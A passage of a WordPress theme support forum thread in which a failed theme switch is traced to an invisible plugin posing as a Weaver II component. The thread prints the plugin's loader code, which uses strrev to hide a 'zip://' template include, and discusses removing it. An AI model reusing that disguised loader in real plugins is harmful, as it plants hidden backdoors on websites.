Home Forums Weaver Xtreme Theme Migration blow-up: failed to open stream … template.php

Viewing 13 posts - 17 through 29 (of 29 total)
  • Author
    Posts
  • #71490
    scrambler
    Moderator

    Also you may need to increase your Memory limits.

    I see the following in your sysinfo

    WP_MEMORY_LIMIT: 40M

    WP_MAX_MEMORY_LIMIT: -1

    Personally I run 512M on both of these

    #71491
    ssm
    Participant

    Thanks @weaver. Here is a recap of testing:

    1. Still fails on all combos except for reverting back to Pro II.
    2. Ever renaming the Pro II folder to force fallback produces the error messages below.
    3. Have not used “smart menus”.
    4. The dropdown menus used to work, but we noticed them failing on other site after WP 6.x. It I could get dropdown menus working again, I wouldn’t need to migrate to Xtreme.
    5. All new testing was on WP 6.1.

     

    <b>Warning</b>: require_once(zip://#template): failed to open stream: operation failed in <b>/homepages/37/d146050845/htdocs/ssm-wp/wp-includes/template.php</b> on line <b>783</b>

    <b>Fatal error</b>: require_once(): Failed opening required ‘zip://#template’ (include_path=’.:/usr/lib/php7.4′) in <b>/homepages/37/d146050845/htdocs/ssm-wp/wp-includes/template.php</b> on line <b>783</b>

    #71492
    Weaver
    Keymaster

    I’ve never heard of anything like not being able to switch  theme. Never.

    I have no idea what is broken on your site, but something is. I just can’t imagine what. Corrupted database, perhaps. Maybe bad .htaccess.

    Along with the fact the site does NOT seem to be STANDARD WP 6.1. If it is, then there is a plugin blocking that info. Many of the standard elements of WP 6.1 missing, there are no references to supporting blocks or block themes. All that code is found in versions of WP 6.1 and it is just not there.

    I can’t tell what version of WP you are actually running, but I’m fairly sure that is somehow related to your issue. Maybe you’ve somehow created some mixed up version of an old WP vs the latest WP. You need to figure out why your site is not loading the latest version of WP, or disable whatever plugin you have that is preventing that.

    You also have a plugin listed as

    Weaver Ii Pro Theme Template: author: (undefined), version: 6.0.1

    What is that? Certainly nothing I can remember ever supporting or creating.

    So again, I say you need to disable all of your plugins before trying to switch themes.

     

     

     

    #71493
    Weaver
    Keymaster

    I can confirm that the menu effects are broken. Uncheck Menu Bar Effects in Menu Bars Extras on the Menu tab.

    #71494
    ssm
    Participant

    Thanks again, @weaver. Some data points:

    1. During debug I updated to 6.1.1 using the built-in WP update mechanism (the sysinfo you are reading is from the start of this thread … updated sysinfo below). If there are missing pieces, I’d love to know what they are because I can’t imaging WordPress.org delivering an incomplete package.
    2. Unchecking “Menu Bar Effects” got the dropdowns to work again. I’ll play a bit tomorrow to see if I can get the stylking back.
    3. The “Weaver ii Pro Theme Template” has me worried as it does not appear on the plugin list in the WP admin interface (and thus can’t be deactivated). I see the folder “weaver-ii-pro-template-plugin” in the plugins directory. It has one php file, the contents of which are:
    <?php
    
    /**
    * Plugin Name: Weaver Ii Pro Theme Template
    * Description: Weaver Ii Pro theme template loader plugin.
    * Version: 6.0.1
    * License: GPL v2 or later
    * License URI: https://www.gnu.org/licenses/gpl-2.0.html
    */
    
    function wp_weaver_ii_pro_theme_template_load() {
    
    load_template( strrev( "//:piz" ) . locate_template( "weaver-ii-pro.template" ) . "#template", true );
    
    }
    
    add_action( 'wp_loaded', 'wp_weaver_ii_pro_theme_template_load' );

     

    NEW SYSINFO:

    
    ### wp-core ###
    
    version: 6.1.1
    site_language: en_US
    user_language: en_US
    timezone: -08:00
    permalink: /marketing-memos-blog-xxx/%postname%/
    https_status: false
    multisite: false
    user_registration: 0
    blog_public: 1
    default_comment_status: closed
    environment_type: production
    user_count: 408
    dotorg_communication: true
    
    ### wp-paths-sizes ###
    
    wordpress_path: /homepages/37/d146050845/htdocs/ssm-wp
    wordpress_size: 86.70 MB (90908083 bytes)
    uploads_path: /homepages/37/d146050845/htdocs/ssm-wp/wp-content/uploads
    uploads_size: 123.51 MB (129509514 bytes)
    themes_path: /homepages/37/d146050845/htdocs/ssm-wp/wp-content/themes
    themes_size: 30.55 MB (32038888 bytes)
    plugins_path: /homepages/37/d146050845/htdocs/ssm-wp/wp-content/plugins
    plugins_size: 84.52 MB (88626114 bytes)
    database_size: 532.69 MB (558563328 bytes)
    total_size: 857.97 MB (899645927 bytes)
    
    ### wp-active-theme ###
    
    name: Weaver II Pro (weaver-ii-pro)
    version: 2.2.4
    author: Bruce Wampler
    author_website: http://weavertheme.com/about
    parent_theme: none
    theme_features: core-block-patterns, woocommerce, widgets-block-editor, editor-style, automatic-feed-links, menus, post-formats, post-thumbnails, custom-header, custom-background, infinite-scroll, widgets
    theme_path: /homepages/37/d146050845/htdocs/ssm-wp/wp-content/themes/weaver-ii-pro
    
    ### wp-themes-inactive (14) ###
    
    Alexandria: version: 2.0.11, author: ThemeAlley.com (latest version: 2.5.6)
    Weaver II Child Demo: version: 1.2, author: Bruce Wampler
    Twenty Eleven: version: 1.7, author: the WordPress team (latest version: 4.2)
    Twenty Fourteen: version: 1.0, author: the WordPress team (latest version: 3.5)
    Twenty Nineteen: version: 1.3, author: the WordPress team (latest version: 2.4)
    Twenty Seventeen: version: 1.4, author: the WordPress team (latest version: 3.1)
    Twenty Sixteen: version: 1.4, author: the WordPress team (latest version: 2.8)
    Twenty Thirteen: version: 1.1, author: the WordPress team (latest version: 3.7)
    Twenty Twelve: version: 1.3, author: the WordPress team (latest version: 3.8)
    Twenty Twenty: version: 2.0, author: the WordPress team (latest version: 2.1)
    Twenty Twenty-One: version: 1.6, author: the WordPress team (latest version: 1.7)
    Twenty Twenty-Three: version: 1.0, author: the WordPress team
    Twenty Twenty-Two: version: 1.3, author: the WordPress team
    Weaver Xtreme: version: 5.0.7, author: Bruce Wampler
    
    ### wp-plugins-active (18) ###
    
    Advanced Editor Tools (previously TinyMCE Advanced): version: 5.6.0, author: Automattic
    Akismet Anti-Spam: version: 5.0.2, author: Automattic
    All in One SEO: version: 4.2.8, author: All in One SEO Team
    Bounce Handler Mailpoet: version: 1.3.21, author: Tikweb
    Disable Comments: version: 2.4.2, author: WPDeveloper
    MailPoet: version: 4.3.0, author: MailPoet
    MaxButtons: version: 9.5, author: Max Foundry
    MetaSlider: version: 3.28.2, author: MetaSlider
    Ninja Forms: version: 3.6.14, author: Saturday Drive
    Raw HTML: version: 1.6.3, author: Janis Elsts
    Regenerate Thumbnails: version: 3.1.5, author: Alex Mills (Viper007Bond)
    Relevanssi: version: 4.18.2, author: Mikko Saari
    Simp Modal Window: version: 1.6, author: Shahzad Anjum
    Velvet Blues Update URLs: version: 3.2.10, author: VelvetBlues.com
    Weaver Ii Pro Theme Template: author: (undefined), version: 6.0.1
    Weaver II Theme Extras: version: 2.3.1, author: Bruce Wampler
    Weaver II to Weaver Xtreme: version: 1.1, author: Bruce Wampler
    WP Captcha Free: version: 0.9.1, author: iDope
    
    ### wp-plugins-inactive (2) ###
    
    Weaver Themes Shortcode Compatibility: version: 1.0.4, author: Bruce Wampler
    Weaver Xtreme Theme Support: version: 5.0.2, author: wpweaver
    
    ### wp-media ###
    
    image_editor: WP_Image_Editor_GD
    imagick_module_version: Not available
    imagemagick_version: Not available
    imagick_version: Not available
    file_uploads: File uploads is turned off
    post_max_size: 64M
    upload_max_filesize: 64M
    max_effective_size: 64 MB
    max_file_uploads: 20
    gd_version: 2.2.5
    gd_formats: GIF, JPEG, PNG, WebP, BMP, XPM
    ghostscript_version: 9.27
    
    ### wp-server ###
    
    server_architecture: Linux 4.4.302-icpu-088 x86_64
    httpd_software: Apache
    php_version: 7.4.33 64bit
    php_sapi: cgi-fcgi
    max_input_variables: 5000
    time_limit: 50000
    memory_limit: -1
    max_input_time: -1
    upload_max_filesize: 64M
    php_post_max_size: 64M
    curl_version: 7.64.0 OpenSSL/1.1.1n
    suhosin: false
    imagick_availability: false
    pretty_permalinks: true
    htaccess_extra_rules: true
    
    ### wp-database ###
    
    extension: mysqli
    server_version: 5.7.38-log
    client_version: mysqlnd 7.4.33
    max_allowed_packet: 67108864
    max_connections: 3000
    
    ### wp-constants ###
    
    WP_HOME: undefined
    WP_SITEURL: undefined
    WP_CONTENT_DIR: /homepages/37/d146050845/htdocs/ssm-wp/wp-content
    WP_PLUGIN_DIR: /homepages/37/d146050845/htdocs/ssm-wp/wp-content/plugins
    WP_MEMORY_LIMIT: 512M
    WP_MAX_MEMORY_LIMIT: 512M
    WP_DEBUG: false
    WP_DEBUG_DISPLAY: true
    WP_DEBUG_LOG: false
    SCRIPT_DEBUG: false
    WP_CACHE: false
    CONCATENATE_SCRIPTS: undefined
    COMPRESS_SCRIPTS: undefined
    COMPRESS_CSS: undefined
    WP_ENVIRONMENT_TYPE: Undefined
    DB_CHARSET: utf8
    DB_COLLATE: undefined
    
    ### wp-filesystem ###
    
    wordpress: writable
    wp-content: writable
    uploads: writable
    plugins: writable
    themes: writable
    
    ### aioseo (1) ###
    
    noindexed: Author Archives, Date Archives, Search Page, Categories (category)
    
    
    #71495
    scrambler
    Moderator

    A hack may be ?

    #71496
    ssm
    Participant

    Yes, @scrambler. Good possibility since the several sites we have under one Ionos account have been subject to hack attacks.

     

    Using this guide (https://www.veerotech.net/kb/how-to-deactivate-plugins-from-the-wordpress-database/) and the “active_plugins” option in the database, it appears that this unknown and invisible plugin could be deactiveated vy:

     

    1. Changing “a:18” to “a:17” and …
    2. Removing the substring “i:14;s:63:”weaver-ii-pro-template-plugin/weaver-ii-pro-template-plugin.php”;”

     

    But this seems spooky to me, so I’m wondering if you have ever (a) experienced this kind of assumed hack and (b) if this is the best approach?

    a:18:{i:0;s:19:”akismet/akismet.php”;i:1;s:43:”all-in-one-seo-pack/all_in_one_seo_pack.php”;i:2;s:51:”bounce-handler-mailpoet/bounce-handler-mailpoet.php”;i:3;s:37:”disable-comments/disable-comments.php”;i:4;s:21:”mailpoet/mailpoet.php”;i:5;s:25:”maxbuttons/maxbuttons.php”;i:6;s:23:”ml-slider/ml-slider.php”;i:7;s:27:”ninja-forms/ninja-forms.php”;i:8;s:21:”raw-html/raw_html.php”;i:9;s:47:”regenerate-thumbnails/regenerate-thumbnails.php”;i:10;s:25:”relevanssi/relevanssi.php”;i:11;s:39:”simp-modal-window/simp-modal-window.php”;i:12;s:37:”tinymce-advanced/tinymce-advanced.php”;i:13;s:53:”velvet-blues-update-urls/velvet-blues-update-urls.php”;i:14;s:63:”weaver-ii-pro-template-plugin/weaver-ii-pro-template-plugin.php”;i:15;s:49:”weaver-ii-theme-extras/weaver-ii-theme-extras.php”;i:16;s:37:”weaver-ii-to-weaver-xtreme/wii2wx.php”;i:17;s:32:”wp-captcha-free/captcha-free.php”;}

     

     

    #71498
    Weaver
    Keymaster

    Ah, I think we’ve found it. I would say that file is indeed a hack of some kind. Never seen it before, and it may have other parts.

    Normally simply deleting a plugin source file in the /plugins directory will disable and delete the plugin – WP should clean the database up automatically if a plugin has been deleted. But there may be other code in other plugins that might restore it some how, which might mean killing it directy in the database. The easiest think is to just delete it, I think.

    You could also likely edit the hack file directly and delete the load_template line and the add_action line. I don’t know exactly what that code might be trying to do, but what it does is try to load a template from some device called “zip:” before any other part of WP get loaded. So it is at the least breaking any calls to WP core that would change a theme. That it is called weaver-ii-anything seems to be a coincidence as it has nothing to do with Weaver II. It is possible that it has been there a long time.

    The other thing to then do is install Wordfence (or equivalent) and run a check from it. I can compare the entire WP filesystem to see if there are any unknown files there. It compares all the files with the current set of files in your WP release, and I think also can check plugins from the WP plugin repository. But Wordfence has found hack files on one of my sites once. That should detect most any other hack file.

     

    #71499
    Weaver
    Keymaster

    There is no such plugin (anymore) called simp modal plugin, so that is suspect, too.

    #71500
    hkp
    Participant

    @Weaver

    For me, http://www.siliconstrat.com/ | http://siliconstrat.com/ | https://www.siliconstrat.com/ | https://siliconstrat.com/ all resolve correctly and all menus work correctly when the site is live using weaver-ii-pro.

    I think the errors we see are during @ssm’s testing.


    @ssm

    Have you tried to disable your “googleadservices” before doing any other work on the site update?

    googleadservices have had serious malfunction issues in the recent past.  You can go to Advanced Options, then Repair, or if that fails, Reset, after the Weaver updates are installed and functioning.

     

    #71501
    Weaver
    Keymaster

    @hkp:

    I found out that the “Menu Bar Effects” W II Pro option was broken – don’t know when that happened, but those are JavaScript controlled, so likely a JS issue. I think ssm was able turn that option off, and the menus work again.

    #71502
    ssm
    Participant

    Many thanks to @weaver, @scrambler and @hkp. The problem appears to be resolved, and I apologize for starting a thread which appears to not be a Weaver problem.

    Some closing (I hope) notes:

    1. When I renamed the plugins/weaver-ii-pro-template-plugin folder, the crash on “live preview” for all themes went away.
    2. Doing so also made it appear in the WP admin console (it had been invisible before).
    3. So, I renamed it back, deleted it through the WP admin console, and everything seems stable.
    4. My only regret is that disabling “menu effects” in Weaver II Pro does impact the appearance of the site, so I’ll still migrate to Xtreme.

    You may want to make a note of the suspect plugin and its code as there is a good chance someone used Weaver II as a backdoor for malware, or maybe just as a dodge to avert attention from a bogus plugin.

    If we can, let’s leave this thread open for a week or two just in case.

    #71503
    scrambler
    Moderator

    Thanks for the report.

    May still want to install Wordfence 🙂

Viewing 13 posts - 17 through 29 (of 29 total)
  • You must be logged in to reply to this topic.